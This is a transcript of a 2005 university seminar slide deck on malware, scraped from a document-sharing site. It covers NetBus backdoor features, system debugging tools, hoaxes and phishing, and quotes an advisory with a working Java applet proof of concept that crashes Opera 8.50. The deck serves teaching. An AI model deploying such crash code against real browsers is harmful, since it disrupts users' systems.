malware – cont. maxim vainstein & emanuel hahamov huji, cs, seminar in software design...

Post on 22-Dec-2015

217 Views

Category:

Documents

1 Downloads

Preview:

Click to see full reader

TRANSCRIPT

Malware – Cont.

Maxim Vainstein & Emanuel Hahamov

HUJI, CS, Seminar in Software Design

08.12.2005

Malware Statistic

Malware Statistic Cont.

Take it “easy…”

Take it “easy”… (Cont.)

Malware – Example

Malware – Example(2)Opera Java Applet DoS

import java.applet.Applet;import java.awt.Graphics;import netscape.javascript.JSObject;

public class OperaTest extends Applet{ static { System.out.println("Loaded 1.2");} public void paint(Graphics g) { System.out.println("start"); try { netscape.javascript.JSObject jso = JSObject.getWindow(this); System.out.println(jso.getClass()); com.opera.JSObject j = (com.opera.JSObject ) jso; char[] x = new char[1000000]; for (int y = 0 ; y < x.length; y++) { x [y] = 'A'; } String z = new String(x); System.out.println("after evalb"); j.removeMember(z); System.out.println("after remove"); } catch (Exception e) { e.printStackTrace(); }}}

Summary Opera is "a computer application for handling most common internet-related tasks, including: web browsing, sending and receiving messages, managing contacts and online chat".A vulnerability in a Opera allows remote attackers to cause the program to crash by utilizing a malicious Java applet. DetailsVulnerable Systems:

 * Opera version 8.50Immune Systems:

 * Opera version 8.51It is possible to crash the opera 8.50 browser with a simple java Applet (see below). This was observed on Win32, Linux versions maybe affected, too.

This can be tested at:http://www.illegalaccess.org/exploit/opera85/OperaApplet.htmlAs you can see the applet crashes at 0x67c0a54c. This is caused by a bug in a JNI routine implementing the com.opera.JSObject class. It cannot beruled out, that this bug is exploitable.The opera guys were informed on the 21st of September, and then again on 8th of October. Code Additional Information

The information has been provided by  <mailto:marc.schoenefeld@gmx.org>Marc Schoenefeld.

System Debug Tools

SysInternals - www.sysinternals.com

Process Explorer FileMon RegMon TcpView TDIMon WinObj More…

Emsi A2-HijackFree LSPfix TaskManager16 Ethreal Network Sniffer

NetBus - Demo

Advanced Remote Control Backdoor Key logger Screen capture Multimedia Capture

Video Sound Microphone

False Remote Administration/Helpdesk ?!

More Malware

Scams and Hoaxes

Malware-related False Information (to force user

for unwanted action)

Scams And Shams Luck-based hoaxes Money-based hoaxes

Urban Legends

Jokes (JOKE_BURST.A, JOKE_TRAIN.B)

No malicious code, but can be noisy

Phishing – Local/Web Network Redirection

False known website BankseCommerceeMails

Questions?

top related